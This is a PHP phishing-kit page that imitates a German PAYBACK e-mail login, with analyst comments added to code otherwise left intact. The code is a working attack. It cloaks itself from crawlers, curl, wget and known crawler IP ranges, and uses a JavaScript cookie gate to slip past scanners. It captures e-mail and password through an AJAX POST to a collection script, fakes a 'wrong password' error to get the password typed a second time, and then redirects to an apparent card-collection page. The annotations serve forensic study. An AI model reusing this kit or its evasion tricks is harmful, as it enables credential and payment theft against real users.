File: /home/u756937133/domains/printsgiggles.com/public_html/payback/mall/index.php
<?php
// === Block & Log Bot Visitors ===
/**
 * Cloaking helper: records a rejected visitor and ends the request with HTTP 403.
 *
 * Analyst notes (defensive reading of this phishing-kit gate):
 * - One line per rejected request is appended to blocked.log in this script's
 *   own directory (__DIR__). If the kit directory is recovered during takedown
 *   or forensics, that file lists the IPs and User-Agents that were refused.
 * - The User-Agent header is written to the log verbatim, with no escaping or
 *   length limit, so log entries are attacker-of-the-kit controllable text;
 *   treat the file as untrusted when parsing it.
 * - The response body is the literal "Access Denied: <reason>." with status 403,
 *   which is a stable string to match on when triaging scanner results.
 *
 * @param string $reason Short label for why the visitor was rejected; it is
 *                       echoed both into the log line and the response body.
 * @return void Never returns: exit() terminates the request.
 */
function logBlocked($reason) {
// Peer address as reported by the web server.
$ip = $_SERVER['REMOTE_ADDR'];
// Falls back to the literal 'Unknown' when no User-Agent header was sent.
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'Unknown';
// Timestamp uses the server's configured timezone (no explicit zone is set here).
$time = date("Y-m-d H:i:s");
$log = "[$time] BLOCKED: $reason | IP: $ip | UA: $ua\n";
// Append-only write; the return value is not checked.
file_put_contents(__DIR__ . '/blocked.log', $log, FILE_APPEND);
http_response_code(403);
exit("Access Denied: $reason.");
}
// === Block by Known Bot User-Agents ===
// Deny-list of lowercase substrings looked for in the visitor's User-Agent.
// It mixes search-engine crawlers with generic tooling markers ('python',
// 'wget', 'curl', 'scrapy', 'crawler').
// Analyst note: a fetch made with a default library or CLI User-Agent is
// answered with the 403 from logBlocked() instead of the page below, so a 403
// from this URL says nothing about whether the lure is live.
$blockedAgents = [
'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'baiduspider',
'yandex', 'sogou', 'exabot', 'facebot', 'ia_archiver',
'mj12bot', 'ahrefsbot', 'semrush', 'dotbot', 'gigabot', 'spbot',
'crawler', 'scrapy', 'python', 'wget', 'curl'
];
// A missing User-Agent header becomes the empty string, which matches nothing.
$ua = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
foreach ($blockedAgents as $bot) {
// Plain substring test anywhere in the header, not a token or prefix match.
if (strpos($ua, $bot) !== false) {
// logBlocked() exits, so the first matching entry ends the request.
logBlocked("Bot User-Agent: $bot");
}
}
// === Block by Known Bot CIDR IP Ranges ===
/**
 * Tests whether a dotted-quad IPv4 address lies inside an IPv4 CIDR range.
 *
 * Both addresses are converted with ip2long() and compared after masking off
 * the host bits.
 *
 * NOTE(review): ip2long() returns false for strings that are not valid IPv4
 * addresses (an IPv6 peer address, for example); that case is not handled
 * explicitly here. The CIDR string is also assumed to contain exactly one
 * '/' followed by a prefix length of 0-32 — nothing validates it.
 *
 * @param string $ip   Address to test (the caller passes REMOTE_ADDR).
 * @param string $cidr Range in "network/prefix" form.
 * @return bool True when the masked address equals the masked network.
 */
function ipInCIDR($ip, $cidr) {
// $mask is the prefix length as a numeric string taken from the CIDR text.
list($net, $mask) = explode('/', $cidr);
$ipDec = ip2long($ip);
$netDec = ip2long($net);
// Bitmask with the low (32 - prefix) host bits cleared.
$maskDec = ~((1 << (32 - $mask)) - 1);
return ($ipDec & $maskDec) === ($netDec & $maskDec);
}
// Example CIDRs of Google, Bing, Ahrefs (partial — you can expand)
// Hard-coded IPv4 ranges that are refused outright. The owner labels on each
// entry are the kit author's own; they are not verified by anything in this file.
// Analyst note: requests from these ranges get the 403 from logBlocked() and
// never see the lure, so results from infrastructure inside them are not
// evidence that the page is benign.
$blockedCIDRs = [
'66.249.64.0/19', // Googlebot
'64.233.160.0/19', // Googlebot
'157.55.0.0/16', // Bingbot
'207.46.0.0/16', // Bingbot
'199.30.228.0/22', // Ahrefs
'5.45.207.0/24', // Ahrefs
];
// Only the direct peer address is consulted; forwarded-for style headers are not read.
$visitorIP = $_SERVER['REMOTE_ADDR'];
foreach ($blockedCIDRs as $cidr) {
if (ipInCIDR($visitorIP, $cidr)) {
// logBlocked() exits, so the first matching range ends the request.
logBlocked("Bot IP Range: $cidr");
}
}
// === JavaScript Challenge ===
// Humans pass, most bots don’t execute JS
// Cookie gate: the page body below is only sent when the request carries a
// cookie named js_challenge_passed. Only the cookie's presence is tested
// (isset); its value is never compared.
// Analyst note: a first request without that cookie receives nothing but the
// one-line script below, so a static fetch or a non-JS sandbox records an
// almost empty response rather than the login form. That literal script is a
// usable content signature for this gate.
if (!isset($_COOKIE['js_challenge_passed'])) {
// Sets the cookie client-side for path "/" and reloads the same URL.
echo "<script>document.cookie='js_challenge_passed=true; path=/';location.reload();</script>";
exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>E-mail » Gleich einloggen! | PAYBACK</title>
<link rel="shortcut icon" href="../img/main-favicon.ico" type="image/x-icon">
<style>
* {
box-sizing: border-box;
margin: 0;
padding: 0;
}
body {
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background: rgb(229, 236, 246);
/* display: flex;
flex-direction: column;
min-height: 100vh; */
}
.login-container {
margin: auto;
background: white;
padding: 20px 30px 0px;
border-radius: 1.2rem;
max-width: 500px;
width: 100%;
position: relative;
}
.loogo {
width: 114px;
margin: auto;
margin-top: 2rem;
margin-bottom: 18px;
}
.loogo img {
width: 100%;
height: auto;
}
.alert {
background: #d14060;
color: #fff;
border: 1px solid #d14060;
padding: 12px;
border-radius: 5px;
margin-bottom: 20px;
font-size: 14px;
text-align: left;
display: none;
align-items: center;
gap: 3px;
}
h2 {
color: rgb(0, 62, 176);
margin-bottom: 20px;
font-weight: 300;
font-family: sans-serif;
}
input[type="text"],
input[type="email"],
input[type="password"] {
width: 100%;
padding: 12px;
margin: 8px 0 20px 0;
border: 1px solid #ccc;
border-radius: 4px;
font-size: 15px;
}
label {
color: rgb(116, 116, 118);
font-size: 16px;
line-height: 1.4;
margin-bottom: 1rem;
font-family: sans-serif;
}
button {
background: rgb(0, 62, 176);
color: white;
padding: 13px;
border: none;
border-radius: 4px;
font-size: 16px;
cursor: pointer;
width: 100%;
/* height: 100%; */
position: relative;
}
button:hover {
background: #00358c;
}
.footer-links {
margin-top: 15px;
font-size: 14px;
}
.footer-links a {
color: #0046b8;
text-decoration: none;
padding: 1.5rem 0px 3.5rem;
text-align: center;
display: block;
}
.footer-links a:hover {
text-decoration: underline;
}
footer {
text-align: center;
margin-top: auto;
padding: 15px;
font-size: 13px;
color: #555;
}
.background__images {
display: flex;
align-items: normal;
justify-content: space-between;
width: 68%;
position: fixed;
bottom: 10%;
z-index: -1;
left: 18%;
}
.background__images image {
width: 200px;
height: 400px;
}
footer {
background: #fff;
position: fixed;
bottom: 0;
left: 0;
width: 100%;
}
.fleelink {
border-top: 1px solid rgb(191, 209, 233);
margin-top: 2rem;
padding-top: 1rem;
width: 60%;
margin: auto;
display: flex;
align-items: center;
justify-content: space-between;
}
.fleelink a {
border-right: 1px solid rgb(191, 209, 233);
color: rgb(0, 62, 176);
text-decoration: none;
cursor: pointer;
font-size: 13px;
padding: 0 8px;
}
.spinner {
font-size: 28px;
position: relative;
display: inline-block;
width: 1em;
height: 1em;
}
.spinner.center {
position: absolute;
left: 0;
right: 0;
top: 0;
bottom: 0;
margin: auto;
}
.spinner .spinner-blade {
position: absolute;
left: 0.4629em;
bottom: 0;
width: 0.074em;
height: 0.2777em;
border-radius: 0.0555em;
background-color: transparent;
-webkit-transform-origin: center -0.2222em;
-ms-transform-origin: center -0.2222em;
transform-origin: center -0.2222em;
animation: spinner-fade9234 1s infinite linear;
}
.spinner .spinner-blade:nth-child(1) {
-webkit-animation-delay: 0s;
animation-delay: 0s;
-webkit-transform: rotate(0deg);
-ms-transform: rotate(0deg);
transform: rotate(0deg);
}
.spinner .spinner-blade:nth-child(2) {
-webkit-animation-delay: 0.083s;
animation-delay: 0.083s;
-webkit-transform: rotate(30deg);
-ms-transform: rotate(30deg);
transform: rotate(30deg);
}
.spinner .spinner-blade:nth-child(3) {
-webkit-animation-delay: 0.166s;
animation-delay: 0.166s;
-webkit-transform: rotate(60deg);
-ms-transform: rotate(60deg);
transform: rotate(60deg);
}
.spinner .spinner-blade:nth-child(4) {
-webkit-animation-delay: 0.249s;
animation-delay: 0.249s;
-webkit-transform: rotate(90deg);
-ms-transform: rotate(90deg);
transform: rotate(90deg);
}
.spinner .spinner-blade:nth-child(5) {
-webkit-animation-delay: 0.332s;
animation-delay: 0.332s;
-webkit-transform: rotate(120deg);
-ms-transform: rotate(120deg);
transform: rotate(120deg);
}
.spinner .spinner-blade:nth-child(6) {
-webkit-animation-delay: 0.415s;
animation-delay: 0.415s;
-webkit-transform: rotate(150deg);
-ms-transform: rotate(150deg);
transform: rotate(150deg);
}
.spinner .spinner-blade:nth-child(7) {
-webkit-animation-delay: 0.498s;
animation-delay: 0.498s;
-webkit-transform: rotate(180deg);
-ms-transform: rotate(180deg);
transform: rotate(180deg);
}
.spinner .spinner-blade:nth-child(8) {
-webkit-animation-delay: 0.581s;
animation-delay: 0.581s;
-webkit-transform: rotate(210deg);
-ms-transform: rotate(210deg);
transform: rotate(210deg);
}
.spinner .spinner-blade:nth-child(9) {
-webkit-animation-delay: 0.664s;
animation-delay: 0.664s;
-webkit-transform: rotate(240deg);
-ms-transform: rotate(240deg);
transform: rotate(240deg);
}
.spinner .spinner-blade:nth-child(10) {
-webkit-animation-delay: 0.747s;
animation-delay: 0.747s;
-webkit-transform: rotate(270deg);
-ms-transform: rotate(270deg);
transform: rotate(270deg);
}
.spinner .spinner-blade:nth-child(11) {
-webkit-animation-delay: 0.83s;
animation-delay: 0.83s;
-webkit-transform: rotate(300deg);
-ms-transform: rotate(300deg);
transform: rotate(300deg);
}
.spinner .spinner-blade:nth-child(12) {
-webkit-animation-delay: 0.913s;
animation-delay: 0.913s;
-webkit-transform: rotate(330deg);
-ms-transform: rotate(330deg);
transform: rotate(330deg);
}
@keyframes spinner-fade9234 {
0% {
background-color: #69717d;
}
100% {
background-color: transparent;
}
}
#loadder {
display: none;
}
#passbpox {
display: none;
}
@media screen and (max-width: 768px) {
.fleelink {
width: 100%;
flex-wrap: wrap;
}
.background__images {
display: flex;
align-items: normal;
justify-content: space-between;
width: 100%;
position: fixed;
bottom: 10%;
z-index: -1;
left: -4%;
}
}
</style>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.inputmask/5.0.6/jquery.inputmask.min.js"></script>
</head>
<body>
<div class="loogo">
<img src="../img/payback-logo-desktop-data.svg" alt="">
</div>
<div class="login-container">
<div class="alert">
<div class="icod" style="display: inline-flex;">
<svg viewBox="0 0 18 18" version="1.1" fill="#fff" width="30" height="30" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<g fill-rule="evenodd" class="fill-color">
<path d="M9 15.6A6.6 6.6 0 1 0 9 2.4a6.6 6.6 0 0 0 0 13.2M9 17A8 8 0 1 1 9 1a8 8 0 0 1 0 16"></path>
<path d="M9.6 12.7L9.3 8h-.5l-.3 4.7h1.1"></path>
<path d="M9.3 7.5h-.5a.6.6 0 0 0-.6.5L8 12.7a.6.6 0 0 0 .6.6h1a.6.6 0 0 0 .6-.6L9.8 8c0-.3-.2-.5-.5-.5m.7-2.1a1 1 0 1 0-2 0 1 1 0 0 0 2 0"></path>
</g>
</svg>
</div> Falsches Passwort, bitte versuchen Sie es erneut.
</div>
<h2>E-Mail-Bestätigung</h2>
<form method="post" id="result" action="">
<label for="">E-Mail-Adresse</label>
<input type="text" name="aa" placeholder="" id="eml" required>
<div id="passbpox">
<label for="">Passwort</label>
<input type="password" name="bb" id="password" placeholder="" required>
</div>
<button type="button" id="btnn">
Fortsetzen
<div id="loadder">
<div class="spinner center">
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
<div class="spinner-blade"></div>
</div>
</div>
</button>
</form>
<div class="footer-links">
<p><a href="#">Noch kein Konto? Jetzt registrieren.</a></p>
</div>
</div>
<div class="background__images">
<img src="../img/image-left-data.png" alt="">
<!-- <img src="https://www.payback.de/resource/blob/327670/bb5914260838b67b1e398db1622a0d92/image-center-data.png" alt=""> -->
<img src="../img/image-right-data.png" alt="">
</div>
<footer>
<div class="fleelink">
<a href="#">Impressum</a>
<a href="#"> Unternehmen</a>
<a href="#">Arbeiten bei PAYBACK</a>
<a href="#">Fragen & Hilfe</a>
<a href="#"> Datenschutz</a>
<a href="#">Barrierefreiheit</a>
<a href="#">Cookie-Einstellungen</a>
</div>
</footer>
<script>
// Stage-one click handler for the "Fortsetzen" button (analyst annotations; code unchanged).
// It makes no network request: it only stages the UI so the password field
// appears after a fake two-second "loading" delay.
document.getElementById("btnn").addEventListener("click", ()=>{
// Empty e-mail field: show a message and stop.
if (document.getElementById("eml").value === "") {
alert("Das Feld darf nicht leer sein");
} else {
// Show the spinner inside the button.
document.getElementById("loadder").style.display = "block";
setTimeout(() => {
// After 2 s: hide the spinner, reveal the hidden password box, and turn the
// button into a submit button so the next click submits form #result.
document.getElementById("loadder").style.display = "none";
document.getElementById("passbpox").style.display = "block";
document.getElementById("btnn").type = "submit";
}, 2000);
}
})
</script>
<script>
// Credential-capture submit handler (analyst annotations; code unchanged).
//
// Flow visible in this block:
//   1. Every submit of form #result is intercepted and POSTed as FormData to the
//      relative endpoint in `fille`. Per the form markup the fields are named
//      `aa` (e-mail) and `bb` (password).
//   2. The first successful POST always shows the "wrong password" banner and
//      clears the password field; the server response is only logged to the
//      console and does not influence which branch runs.
//   3. The second and any later successful POST redirects to ./card.php.
//
// Incident-response reading: a user who reports one "wrong password" error
// followed by a redirect has most likely submitted a password twice; treat
// every value typed into this form as exposed.

// Binds the name `alert` to the red banner element (.alert) that holds the
// "Falsches Passwort" text in the markup.
const alert = document.querySelector(".alert");
// Collection endpoint, relative to this page. The trailing comment is the kit
// template's own placeholder hint.
var fille = "../config/email2.php"; // Your php url here e.g http://youdomain.com/result.php
// Counts submit attempts for this page load; drives the two-stage flow.
var formSubmitted = 0;
$("#result").on("submit", function (event) {
// Suppress the browser's native form post; the data is sent via $.ajax below.
event.preventDefault();
document.getElementById("loadder").style.display = "block";
// Incremented before validation, so an attempt rejected below still counts.
formSubmitted++;
var inputs = $('input[required]');
for (var i = 0; i < inputs.length; i++) {
if (!inputs[i].value.trim()) {
alert("Das Feld darf nicht leer sein");
return;
}
}
// Collects every named field of the form (aa, bb).
var formData = new FormData(this);
$.ajax({
url: `${fille}`,
type: 'POST',
data: formData,
processData: false, // Required to send FormData
contentType: false, // Required to not set default content type
success: function (response) {
console.log(response);
if (formSubmitted === 1) {
// First attempt: clear the password, outline the field in red and show the
// banner, regardless of what the server answered.
document.getElementById("password").value = "";
document.getElementById("password").style.border = "1px solid red";
alert.style.display = "flex";
setTimeout(() => {
document.getElementById("loadder").style.display = "none";
}, 1500);
setTimeout(() => {
document.getElementById("password").style.border = "1px solid #0271ff";
}, 2500);
} else if (formSubmitted >= 2) {
console.log("GOOOOOO");
// Next stage of the kit. NOTE(review): the file name suggests payment-card
// collection, but card.php is not part of this file — confirm.
setTimeout(() => {
window.location.href = `./card.php`;
}, 2000);
}
}
});
});
</script>
</body>
</html>